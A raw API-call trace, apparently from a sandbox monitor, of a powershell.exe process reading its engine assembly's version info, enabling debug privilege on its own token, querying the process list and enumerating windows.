	[0848.297] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12da70 | out: lpFileInformation=0x12da70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0848.298] SetErrorMode (uMode=0x1) returned 0x1
	[0848.301] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12dce0 | out: lpdwHandle=0x12dce0) returned 0x94c
	[0848.303] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b472d8 | out: lpData=0x2b472d8) returned 1
	[0848.367] VerQueryValueW (in: pBlock=0x2b472d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dc58, puLen=0x12dc50 | out: lplpBuffer=0x12dc58*=0x2b47374, puLen=0x12dc50) returned 1
	[0848.371] lstrlenW (lpString="䅁") returned 1
	[0848.383] VerQueryValueW (in: pBlock=0x2b472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12dbc8, puLen=0x12dbc0 | out: lplpBuffer=0x12dbc8*=0x2b47450, puLen=0x12dbc0) returned 1
	[0848.384] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0848.386] CoTaskMemAlloc (cb=0x2e) returned 0x2de120
	[0848.386] lstrcpyW (in: lpString1=0x2de120, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0848.387] CoTaskMemFree (pv=0x2de120) 
	[0848.387] VerQueryValueW (in: pBlock=0x2b472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12dbc8, puLen=0x12dbc0 | out: lplpBuffer=0x12dbc8*=0x2b474a4, puLen=0x12dbc0) returned 1
	[0848.387] lstrlenW (lpString="System.Management.Automation") returned 28
	[0848.387] CoTaskMemAlloc (cb=0x3c) returned 0x259020
	[0848.388] lstrcpyW (in: lpString1=0x259020, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0848.388] CoTaskMemFree (pv=0x259020) 
	[0848.388] VerQueryValueW (in: pBlock=0x2b472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12dbc8, puLen=0x12dbc0 | out: lplpBuffer=0x12dbc8*=0x2b47500, puLen=0x12dbc0) returned 1
	[0848.388] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0848.388] CoTaskMemAlloc (cb=0x20) returned 0x2df1d0
	[0848.388] lstrcpyW (in: lpString1=0x2df1d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0848.388] CoTaskMemFree (pv=0x2df1d0) 
	[0848.388] VerQueryValueW (in: pBlock=0x2b472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12dbc8, puLen=0x12dbc0 | out: lplpBuffer=0x12dbc8*=0x2b47540, puLen=0x12dbc0) returned 1
	[0848.388] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0848.388] CoTaskMemAlloc (cb=0x44) returned 0x259020
	[0848.388] lstrcpyW (in: lpString1=0x259020, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0848.388] CoTaskMemFree (pv=0x259020) 
	[0848.388] VerQueryValueW (in: pBlock=0x2b472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12dbc8, puLen=0x12dbc0 | out: lplpBuffer=0x12dbc8*=0x2b475a8, puLen=0x12dbc0) returned 1
	[0848.388] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0848.388] CoTaskMemAlloc (cb=0x76) returned 0x27f1c0
	[0848.388] lstrcpyW (in: lpString1=0x27f1c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0848.388] CoTaskMemFree (pv=0x27f1c0) 
	[0848.388] VerQueryValueW (in: pBlock=0x2b472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12dbc8, puLen=0x12dbc0 | out: lplpBuffer=0x12dbc8*=0x2b47644, puLen=0x12dbc0) returned 1
	[0848.388] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0848.388] CoTaskMemAlloc (cb=0x44) returned 0x259020
	[0848.388] lstrcpyW (in: lpString1=0x259020, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0848.388] CoTaskMemFree (pv=0x259020) 
	[0848.388] VerQueryValueW (in: pBlock=0x2b472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12dbc8, puLen=0x12dbc0 | out: lplpBuffer=0x12dbc8*=0x2b476a8, puLen=0x12dbc0) returned 1
	[0848.388] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0848.388] CoTaskMemAlloc (cb=0x58) returned 0x2a4540
	[0848.388] lstrcpyW (in: lpString1=0x2a4540, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0848.388] CoTaskMemFree (pv=0x2a4540) 
	[0848.388] VerQueryValueW (in: pBlock=0x2b472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12dbc8, puLen=0x12dbc0 | out: lplpBuffer=0x12dbc8*=0x2b47724, puLen=0x12dbc0) returned 1
	[0848.388] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0848.388] CoTaskMemAlloc (cb=0x20) returned 0x2df1d0
	[0848.389] lstrcpyW (in: lpString1=0x2df1d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0848.389] CoTaskMemFree (pv=0x2df1d0) 
	[0848.389] VerQueryValueW (in: pBlock=0x2b472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12dbc8, puLen=0x12dbc0 | out: lplpBuffer=0x12dbc8*=0x2b473cc, puLen=0x12dbc0) returned 1
	[0848.389] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0848.389] CoTaskMemAlloc (cb=0x66) returned 0x2d3ba0
	[0848.389] lstrcpyW (in: lpString1=0x2d3ba0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0848.389] CoTaskMemFree (pv=0x2d3ba0) 
	[0848.389] VerQueryValueW (in: pBlock=0x2b472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12dbc8, puLen=0x12dbc0 | out: lplpBuffer=0x12dbc8*=0x0, puLen=0x12dbc0) returned 0
	[0848.389] VerQueryValueW (in: pBlock=0x2b472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12dbc8, puLen=0x12dbc0 | out: lplpBuffer=0x12dbc8*=0x0, puLen=0x12dbc0) returned 0
	[0848.389] VerQueryValueW (in: pBlock=0x2b472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12dbc8, puLen=0x12dbc0 | out: lplpBuffer=0x12dbc8*=0x0, puLen=0x12dbc0) returned 0
	[0848.389] VerQueryValueW (in: pBlock=0x2b472d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12db98, puLen=0x12db90 | out: lplpBuffer=0x12db98*=0x2b47374, puLen=0x12db90) returned 1
	[0848.390] CoTaskMemAlloc (cb=0x204) returned 0x28d960
	[0848.390] VerLanguageNameW (in: wLang=0x0, szLang=0x28d960, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0849.359] CoTaskMemFree (pv=0x28d960) 
	[0849.359] VerQueryValueW (in: pBlock=0x2b472d8, lpSubBlock="\\", lplpBuffer=0x12dbe8, puLen=0x12dbe0 | out: lplpBuffer=0x12dbe8*=0x2b47300, puLen=0x12dbe0) returned 1
	[0849.365] GetCurrentProcessId () returned 0x1120
	[0849.382] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12cb10 | out: lpLuid=0x12cb10*(LowPart=0x14, HighPart=0)) returned 1
	[0849.385] GetCurrentProcess () returned 0xffffffffffffffff
	[0849.386] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x12cb30 | out: TokenHandle=0x12cb30*=0x2d0) returned 1
	[0849.387] AdjustTokenPrivileges (in: TokenHandle=0x2d0, DisableAllPrivileges=0, NewState=0x2b4ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0849.389] CloseHandle (hObject=0x2d0) returned 1
	[0850.875] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1120) returned 0x2d0
	[0850.884] EnumProcessModules (in: hProcess=0x2d0, lphModule=0x2b4abb8, cb=0x200, lpcbNeeded=0x12db48 | out: lphModule=0x2b4abb8, lpcbNeeded=0x12db48) returned 1
	[0850.886] GetModuleInformation (in: hProcess=0x2d0, hModule=0x13f370000, lpmodinfo=0x2b4ae28, cb=0x18 | out: lpmodinfo=0x2b4ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0850.887] CoTaskMemAlloc (cb=0x804) returned 0x2e0270
	[0850.887] GetModuleBaseNameW (in: hProcess=0x2d0, hModule=0x13f370000, lpBaseName=0x2e0270, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0850.888] CoTaskMemFree (pv=0x2e0270) 
	[0850.888] CoTaskMemAlloc (cb=0x804) returned 0x2e0270
	[0850.888] GetModuleFileNameExW (in: hProcess=0x2d0, hModule=0x13f370000, lpFilename=0x2e0270, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0850.889] CoTaskMemFree (pv=0x2e0270) 
	[0850.890] CloseHandle (hObject=0x2d0) returned 1
	[0850.898] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x1120) returned 0x2d0
	[0850.899] GetExitCodeProcess (in: hProcess=0x2d0, lpExitCode=0x12dc78 | out: lpExitCode=0x12dc78*=0x103) returned 1
	[0850.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b4b088, Length=0x20000, ResultLength=0x12dc40 | out: SystemInformation=0x12b4b088, ResultLength=0x12dc40*=0x45e48) returned 0xc0000004
	[0852.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b6b0b8, Length=0x48648, ResultLength=0x12dc40 | out: SystemInformation=0x12b6b0b8, ResultLength=0x12dc40*=0x46148) returned 0x0
	[0854.297] EnumWindows (lpEnumFunc=0x27d66ac, lParam=0x0) 
	[0854.302] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.302] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x558
	[0854.302] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.302] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.302] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.302] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x538
	[0854.302] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.303] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x778
	[0854.303] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x778
	[0854.303] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.303] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.303] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.303] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.303] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.303] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.303] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.304] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.304] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x460
	[0854.304] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.304] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4d0
	[0854.304] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1fb0
	[0854.304] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1e10
	[0854.304] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x23a8
	[0854.305] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1f24
	[0854.305] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x21ec
	[0854.305] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x2320
	[0854.305] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1fd4
	[0854.305] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1880
	[0854.305] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1b18
	[0854.305] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1d6c
	[0854.305] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x233c
	[0854.305] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x2368
	[0854.306] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x2124
	[0854.306] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x22f0
	[0854.306] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x22ac
	[0854.306] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1cdc
	[0854.306] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x10f0
	[0854.306] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1f18
	[0854.306] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x20a8
	[0854.307] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x2004
	[0854.307] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1f88
	[0854.307] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1f84
	[0854.307] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x2050
	[0854.307] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1e04
	[0854.307] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1ecc
	[0854.307] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1e64
	[0854.308] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1b58
	[0854.308] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1e94
	[0854.308] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1e28
	[0854.308] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1df8
	[0854.308] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1da8
	[0854.308] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1c70
	[0854.308] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x163c
	[0854.308] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1a10
	[0854.308] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x186c
	[0854.309] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1d74
	[0854.309] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x4c8
	[0854.309] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1960
	[0854.309] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1ce4
	[0854.309] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1b24
	[0854.309] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x14e0
	[0854.309] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x17f0
	[0854.309] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x854
	[0854.310] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1268
	[0854.310] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1624
	[0854.310] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1b9c
	[0854.310] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x16f4
	[0854.310] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x145c
	[0854.313] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x17d0
	[0854.313] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1d28
	[0854.313] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xcb8
	[0854.313] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1190
	[0854.314] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x3a8
	[0854.314] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1bd0
	[0854.314] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1bfc
	[0854.314] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1a78
	[0854.314] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1b90
	[0854.314] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1b04
	[0854.314] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1b34
	[0854.314] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1b64
	[0854.315] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1bb0
	[0854.315] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1acc
	[0854.315] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1a2c
	[0854.315] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x19a8
	[0854.315] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1944
	[0854.315] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x18c8
	[0854.315] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x18ac
	[0854.315] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x18ec
	[0854.315] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1898
	[0854.316] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0xc98
	[0854.316] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x153c
	[0854.316] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1808
	[0854.316] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x12a4
	[0854.316] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1740
	[0854.316] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x16c4
	[0854.316] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1820
	[0854.316] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x16ac
	[0854.317] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1858
	[0854.317] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1664
	[0854.317] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x10b4
	[0854.317] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x10ac
	[0854.317] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x10ec
	[0854.318] GetWindow (hWnd=0x20378, uCmd=0x4) returned 0x0
	[0854.319] IsWindowVisible (hWnd=0x20378) returned 0
	[0854.319] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1068
	[0854.319] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x17e0
	[0854.319] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x102c
	[0854.319] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x17a4
	[0854.319] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1050
	[0854.319] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1694
	[0854.319] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1770
	[0854.320] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1720
	[0854.320] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x165c
